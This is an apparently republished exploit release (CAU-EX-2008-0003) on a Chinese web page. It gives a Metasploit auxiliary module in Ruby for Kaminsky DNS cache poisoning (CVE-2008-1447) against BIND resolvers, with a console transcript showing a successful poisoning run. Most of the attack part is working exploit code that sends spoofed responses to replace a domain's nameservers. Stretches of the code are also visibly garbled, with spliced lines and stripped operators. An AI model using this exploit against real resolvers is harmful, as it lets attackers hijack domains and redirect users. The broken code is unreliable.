Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
发布时间:2016-02-19 来源:查字典编辑
摘要:____________//||||----====####//__##//##||##||####====----||||__||||||...

____ ____ __ __

/ / | | | |

----====####/ /__##/ / ##| |##| |####====----

| | | |__| | | | | |

| | ___ | __ | | | | |

------======###### / /#| |##| |#| |##| |######======------

____/ |__| |__| ______/

Computer Academic Underground

Exploit Code

===============/========================================================

Exploit ID: CAU-EX-2008-0003

Release Date: 2008.07.23

Title: bailiwicked_domain.rb

Description: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains

Tested: BIND 9.4.1-9.4.2

Attributes: Remote, Poison, Resolver, Metasploit

Exploit URL: /exploits/CAU-EX-2008-0003.txt

Author/Email: I)ruid

H D Moore

===============/========================================================

Description

===========

This exploit targets a fairly ubiquitous flaw in DNS implementations

which allow the insertion of malicious DNS records into the cache of the

target nameserver. This exploit caches a single malicious nameserver

entry into the target nameserver which replaces the legitimate

nameservers for the target domain. By causing the target nameserver to

query for random hostnames at the target domain, the attacker can spoof

a response to the target server including an answer for the query, an

authority server record, and an additional record for that server,

causing target nameserver to insert the additional record into the

cache. This insertion completely replaces the original nameserver

records for the target domain.

Example

=======

# /msf3/msfconsole

## ### ## ##

## ## #### ###### #### ##### ##### ## #### ######

####### ## ## ## ## ## ## ## ## ## ## ### ##

####### ###### ## ##### #### ## ## ## ## ## ## ##

## # ## ## ## ## ## ## ##### ## ## ## ## ##

## ## #### ### ##### ##### ## #### #### #### ###

##

=[ msf v3.2-release

-- --=[ 298 exploits - 124 payloads

-- --=[ 18 encoders - 6 nops

=[ 73 aux

msf > use auxiliary/spoof/dns/bailiwicked_domain

msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D

RHOST => A.B.C.D

msf auxiliary(bailiwicked_domain) > set DOMAIN

DOMAIN =>

msf auxiliary(bailiwicked_domain) > set NEWDNS

NEWDNS =>

msf auxiliary(bailiwicked_domain) > set SRCPORT 0

SRCPORT => 0

msf auxiliary(bailiwicked_domain) > check

[*] Using the Metasploit service to verify exploitability...

[*] >> ADDRESS: A.B.C.D PORT: 50391

[*] >> ADDRESS: A.B.C.D PORT: 50391

[*] >> ADDRESS: A.B.C.D PORT: 50391

[*] >> ADDRESS: A.B.C.D PORT: 50391

[*] >> ADDRESS: A.B.C.D PORT: 50391

[*] FAIL: This server uses static source ports and is vulnerable to poisoning

msf auxiliary(bailiwicked_domain) > dig short -t ns @A.B.C.D

[*] exec: dig short -t ns @A.B.C.D

b.iana-.

a.iana-.

msf auxiliary(bailiwicked_domain) > run

[*] Switching to target port 50391 based on Metasploit service

[*] Targeting nameserver A.B.C.D for injection of . nameservers as

[*] Querying recon nameserver for .'s nameservers...

[*] Got an NS record: . 171957 IN NS b.iana-.

[*] Querying recon nameserver for address of b.iana-....

[*] Got an A record: b.iana-. 171028 IN A 193.0.0.236

[*] Checking Authoritativeness: Querying 193.0.0.236 for ....

[*] b.iana-. is authoritative for ., adding to list of nameservers to spoof as

[*] Got an NS record: . 171957 IN NS a.iana-.

[*] Querying recon nameserver for address of a.iana-....

[*] Got an A record: a.iana-. 171414 IN A 192.0.34.43

[*] Checking Authoritativeness: Querying 192.0.34.43 for ....

[*] a.iana-. is authoritative for ., adding to list of nameservers to spoof as

[*] Attempting to inject poison records for .'s nameservers into A.B.C.D:50391...

[*] Sent 1000 queries and 20000 spoofed responses...

[*] Sent 2000 queries and 40000 spoofed responses...

[*] Sent 3000 queries and 60000 spoofed responses...

[*] Sent 4000 queries and 80000 spoofed responses...

[*] Sent 5000 queries and 100000 spoofed responses...

[*] Sent 6000 queries and 120000 spoofed responses...

[*] Sent 7000 queries and 140000 spoofed responses...

[*] Sent 8000 queries and 160000 spoofed responses...

[*] Sent 9000 queries and 180000 spoofed responses...

[*] Sent 10000 queries and 200000 spoofed responses...

[*] Sent 11000 queries and 220000 spoofed responses...

[*] Sent 12000 queries and 240000 spoofed responses...

[*] Sent 13000 queries and 260000 spoofed responses...

[*] Poisoning successful after 13250 attempts: . ==

[*] Auxiliary module execution completed

msf auxiliary(bailiwicked_domain) > dig short -t ns @A.B.C.D

[*] exec: dig short -t ns @A.B.C.D

.

Credits

=======

Dan Kaminsky is credited with originally discovering this vulnerability.

References

==========

/cgi-bin/cvename.cgi?name=CVE-2008-1447

/vuls/id/800113

Metasploit

==========

require 'msf/core'

require 'net/dns'

require 'scruby'

require 'resolv'

module Msf

class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary

include Exploit::Remote::Ip

def initialize(info = {})

super(update_info(info,

'Name' => 'DNS BailiWicked Domain Attack',

'Description' => %q{

This exploit attacks a fairly ubiquitous flaw in DNS implementations which

Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target

domains nameserver entries in a vulnerable DNS cache server. This attack works

by sending random hostname queries to the target DNS server coupled with spoofed

replies to those queries from the authoritative nameservers for that domain.

Eventually, a guessed ID will match, the spoofed packet will get accepted, and

the nameserver entries for the target domain will be replaced by the server

specified in the NEWDNS option of this exploit.

},

'Author' => [ 'I)ruid', 'hdm' ],

'License' => MSF_LICENSE,

'Version' => '$Revision: 5590 $',

'References' =>

[

[ 'CVE', '2008-1447' ],

[ 'US-CERT-VU', '8000113' ],

[ 'URL', '/exploits/CAU-EX-2008-0003.txt' ],

],

'DisclosureDate' => 'Jul 21 2008'

))

register_options(

[

OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),

OptString.new('DOMAIN', [true, 'The domain to hijack', '']),

OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),

OptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']),

OptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),

OptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]),

], self.class)

end

def auxiliary_commands

return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" }

end

def cmd_check(*args)

targ = args[0] || rhost()

if(not (targ and targ.length > 0))

print_status("usage: check [dns-server]")

return

end

print_status("Using the Metasploit service to verify exploitability...")

srv_sock = Rex::Socket.create_udp(

'PeerHost' => targ,

'PeerPort' => 53

)

random = false

ports = []

lport = nil

1.upto

(5) do |i|

req = Resolv::DNS::Message.new

txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}"

req.add_question(txt, Resolv::DNS::Resource::IN::TXT)

req.rd = 1

srv_sock.put(req.encode)

res, addr = srv_sock.recvfrom()

if res and res.length > 0

res = Resolv::DNS::Message.decode(res)

res.each_answer do |name, ttl, data|

if (name.to_s == txt and data.strings.join('') =~ /^([^s] )s .*/m)

t_addr, t_port = $1.split(':')

print_status(" >> ADDRESS: #{t_addr} PORT: #{t_port}")

t_port = t_port.to_i

if(lport and lport != t_port)

random = true

end

lport = t_port

ports target,

'PeerPort' => 53

)

# Get the source port via the metasploit service if it's not set

if sport.to_i == 0

req = Resolv::DNS::Message.new

txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}"

req.add_question(txt, Resolv::DNS::Resource::IN::TXT)

req.rd = 1

srv_sock.put(req.encode)

res, addr = srv_sock.recvfrom()

if res and res.length > 0

res = Resolv::DNS::Message.decode(res)

res.each_answer do |name, ttl, data|

if (name.to_s == txt and data.strings.join('') =~ /^([^s] )s .*/m)

t_addr, t_port = $1.split(':')

sport = t_port.to_i

print_status("Switching to target port #{sport} based on Metasploit service")

if target != t_addr

print_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!")

end

end

end

end

end

# Verify its not already poisoned

begin

query = Resolv::DNS::Message.new

query.add_question(domain, Resolv::DNS::Resource::IN::NS)

query.rd = 0

begin

cached = false

srv_sock.put(query.encode)

answer, addr = srv_sock.recvfrom()

if answer and answer.length > 0

answer = Resolv::DNS::Message.decode(answer)

answer.each_answer do |name, ttl, data|

if((name.to_s ".") == domain and data.name.to_s == newdns)

t = Time.now ttl

print_status("Failure: This domain is already using #{newdns} as a nameserver")

print_status(" Cache entry expires on #{t.to_s}")

srv_sock.close

disconnect_ip

return

end

end

end

end until not cached

rescue ::Interrupt

raise $!

rescue ::Exception => e

print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}")

end

res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver

print_status "Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}"

# Look up the nameservers for the domain

print_status "Querying recon nameserver for #{domain}'s nameservers..."

answer0 = res0.send(domain, Net::DNS::NS)

#print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities"

barbs = [] # storage for nameservers

answer0.answer.each do |rr0|

print_status " Got an #{rr0.type} record: #{rr0.inspect}"

if rr0.type == 'NS'

print_status " Querying recon nameserver for address of #{rr0.nsdname}..."

answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname

#print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities"

answer1.answer.each do |rr1|

print_status " Got an #{rr1.type} record: #{rr1.inspect}"

res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1)

print_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..."

answer2 = res2.send(domain)

if answer2 and answer2.header.auth? and answer2.header.anCount >= 1

nsrec = {:name => rr0.nsdname, :addr => rr1.address}

barbs barbs[0][:addr].to_s,

:src => source,

:dst => target,

:proto => 17

)/Scruby::UDP.new(

:sport => (rand((2**16)-1024) 1024).to_i,

:dport => 53

)/req.encode

).to_net

ip_sock.sendto(buff, target)

queries = 1

# Send evil spoofed answer from ALL nameservers (barbs[*][:addr])

req.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address))

req.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns)))

req.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored

req.qr = 1

req.aa = 1

xidbase.upto(xidbase xids-1) do |id|

req.id = id

barbs.each do |barb|

buff = (

Scruby::IP.new(

#:src => barbs[i][:addr].to_s,

:src => barb[:addr].to_s,

:dst => target,

:proto => 17

)/Scruby::UDP.new(

:sport => 53,

:dport => sport.to_i

)/req.encode

).to_net

ip_sock.sendto(buff, target)

responses = 1

end

end

# status update

if queries % 1000 == 0

print_status("Sent #{queries} queries and #{responses} spoofed responses...")

end

# every so often, check and see if the target is poisoned...

if queries % 250 == 0

begin

query = Resolv::DNS::Message.new

query.add_question(domain, Resolv::DNS::Resource::IN::NS)

query.rd = 0

srv_sock.put(query.encode)

answer, addr = srv_sock.recvfrom()

if answer and answer.length > 0

answer = Resolv::DNS::Message.decode(answer)

answer.each_answer do |name, ttl, data|

if((name.to_s ".") == domain and data.name.to_s == newdns)

print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}")

srv_sock.close

disconnect_ip

return

end

end

end

rescue ::Interrupt

raise $!

rescue ::Exception => e

print_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}")

end

end

end

end

end

end

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新电脑安全教程学习
热门电脑安全教程学习
电脑子分类